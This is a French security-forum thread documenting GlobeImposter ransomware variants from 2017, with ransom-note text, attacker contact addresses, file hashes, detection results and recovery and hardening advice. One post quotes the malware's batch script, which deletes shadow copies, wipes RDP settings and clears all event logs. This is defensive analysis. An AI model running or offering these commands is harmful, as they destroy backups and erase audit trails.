GLOBEIMPOSTER RANSOMWARE (.725)

Les malwares de type Ransomware et rançongiciels
Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

GLOBEIMPOSTER RANSOMWARE (.725)

Message par Malekal_morte » 12 juil. 2017 17:21

GLOBEIMPOSTER RANSOMWARE est une variante de rançongiciel et Crypto-Ransomware (rançongiciel chiffreur de fichiers).
Courant Juillet une campagne de mail malveillant a fait la promotion de ce type de cette famille GLOBEIMPOSTER.

Microsoft détecte ce dernier en Ransom:Win32/Septrypt, depuis juillet 2017, les campagnes par mail de ce ransomware sont quotidiennes.

Distribution du ransomware GlobeImposter (extension .crypt)

Rien de vraiment nouveau.
Le mail contient une pièce jointe avec un script malveillant (se reporter à la page : Comment se protéger des scripts malicieux sur Windows).
GLOBEIMPOSTER-ransomware-crypt.png
GLOBEIMPOSTER RANSOMWARE - extension .crypt
Une fois exécuté, les versions précédentes de fichiers sont supprimés à l'aide de la commande vssadmin.
GLOBEIMPOSTER-ransomware-crypt-2.png
GLOBEIMPOSTER RANSOMWARE - extension .crypt
puis les fichiers sont chiffrés et l'extension est modifiée en .crypt
Un fichier instruction contenant les informations de paiement sont aussi placés dans chaque dossier : how_to_back_files.html
GLOBEIMPOSTER-ransomware-crypt-3.png
GLOBEIMPOSTER RANSOMWARE - extension .crypt
Le paiement se fait par bitcoin, l'adresse de contact est : chines34@protonmail.ch
GLOBEIMPOSTER-ransomware-crypt-4.png
GLOBEIMPOSTER RANSOMWARE - extension .crypt
A noter que le ransomware GLOBEIMPOSTER peut aussi être distribué à travers des piratages RDP.
Plus d'informations :
Piratage de serveurs Windows par Terminal Server


Récupérer les fichiers .crypt

La récupération des fichiers chiffrés par le ransomware .crypt est normalement impossible.
Du moins, les pirates cherchent à ce qu'il n'y est aucun moyen afin de vous obliger à payer.
Surveillez la page suivante, pour une mise à disposition d'un outil spécifique : Outils de décryptage (Decrypt Tools Ransomware)

Vous pouvez tenter de récupérer les fichiers avec Shadow Explorer - versions précédentes
Plus d'informations : Ransomware et récupération de fichiers


Sécuriser son Windows

Afin de sécuriser son Windows et éviter les ransomwares et d'autres menaces connues sur la toile, suivre le tutoriel de sécurisation de son Windows.
Comment se protéger des scripts malveillants sur Windows
et limiter PowerShell : Les virus Powershell

et plus globalement, suivez les conseils de la page : Sécuriser son Windows.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: GLOBEIMPOSTER RANSOMWARE (.alet)

Message par Malekal_morte » 18 juil. 2017 23:51

Autre variante avec decryptyourfileshereee1@cock.li
L'extension des fichiers chiffrés est modifié en .alet!
Le fichier instruction est : #_READ_ME_#!.ht

La fenêtre instruction se place en avant plan et ne peut-être fermé, ce qui rend ce ransomware pénible.
Les exécutables se trouvant sur le bureau sont chiffrés.
ransomware-decryptyourfileshereee1-cock-li.png
ransomware decryptyourfileshereee1@cock.li
A noter que le fichier est signé :
https://www.virustotal.com/fr/file/2a36 ... 500414209/
SHA256: 2a36b368de79461ad8d1c55e580566f1fdf50af74d7625d2fb007873c94b7d9b
Nom du fichier : srsp5lnmp.exe
Ratio de détection : 6 / 63
Date d'analyse : 2017-07-18 21:43:29 UTC (il y a 0 minute)

Antivirus Résultat Mise à jour
Emsisoft Trojan.FileCoder (A) 20170718
Endgame malicious (high confidence) 20170713
Invincea heuristic 20170607
Rising Malware.Heuristic!ET#84% (rdm+) 20170718
Symantec ML.Attribute.HighConfidence 20170718
Webroot W32.Trojan.Gen 20170718
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: GLOBEIMPOSTER RANSOMWARE (extension .725)

Message par Malekal_morte » 28 juil. 2017 15:59

Les variantes et campagnes du ransomware Globeimposter continuent, avec une variante poussant l'extension .725
Globeimposter lance un batch qui permet de désactiver tous les shadow copies et supprimer tous les paramètres Terminal Server.
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
Les documents chiffrés avec l'extension .725 et le fichier RECOVER-FILES.html dont le contenu a un peu évolué avec un message :
Your files are Encrypted!

For data recovery needs decryptor.

If you want to buy a decryptor, click the button

Your files are Encrypted!

For data recovery needs decryptor.

If you want to buy a decryptor, click the button
globalimposter-variante-725.png
GLOBEIMPOSTER RANSOMWARE (extension .725)
qui mène au site de paiement suivant : hxxps://n224ezvhg4sgyamb.onion.link/efwdaq.php
globalimposter-variante-725-.png
GLOBEIMPOSTER RANSOMWARE (extension .725)
globalimposter-variante-725--.png
GLOBEIMPOSTER RANSOMWARE (extension .725)
Exemple de détection VirusTotal :

SHA256: 72ddceebe717992c1486a2d5a5e9e20ad331a98a146d2976c943c983e088f66b
Nom du fichier : sNNjoOXsMwH.exe
Ratio de détection : 22 / 64
Date d'analyse : 2017-07-28 13:52:45 UTC (il y a 0 minute)
0 4
Analyse
File detail
Informations supplémentaires
Commentaires
Votes
Informations comportementales
Antivirus Résultat Mise à jour
AegisLab Ml.Attribute.Gen!c 20170728
Avast Win32:Malware-gen 20170728
AVG Win32:Malware-gen 20170728
Avira (no cloud) TR/Crypt.Xpack.uodll 20170728
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9888 20170728
CrowdStrike Falcon (ML) malicious_confidence_80% (W) 20170710
Cylance Unsafe 20170728
DrWeb Win32.HLLM.Reset.493 20170728
Endgame malicious (high confidence) 20170721
ESET-NOD32 a variant of Win32/Kryptik.FUYC 20170728
Sophos ML heuristic 20170607
Kaspersky UDS:DangerousObject.Multi.Generic 20170728
McAfee Artemis!4E2B58F99AD9 20170728
McAfee-GW-Edition BehavesLike.Win32.PWSZbot.dc 20170728
eScan Trojan.Agent.CKFN 20170728
Palo Alto Networks (Known Signatures) generic.ml 20170728
Rising Trojan.Ransom.GlobeImposter!1.AC37 (classic) 20170728
SentinelOne (Static ML) static engine - malicious 20170718
Symantec ML.Attribute.HighConfidence 20170728
Tencent Win32.Trojan.Raas.Auto 20170728
Webroot W32.Trojan.Gen 20170728
ZoneAlarm by Check Point UDS:DangerousObject.Multi.Generic 20170728
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: GLOBEIMPOSTER RANSOMWARE (.725)

Message par Malekal_morte » 01 août 2017 09:42

Variante avec extension .ocean et fichier d'instruction de paiement !back_files!.html :
globeimposter-ocean.jpg
GloeImposter variante extension .ocean
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Répondre

Revenir vers « Ransomware »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 1 invité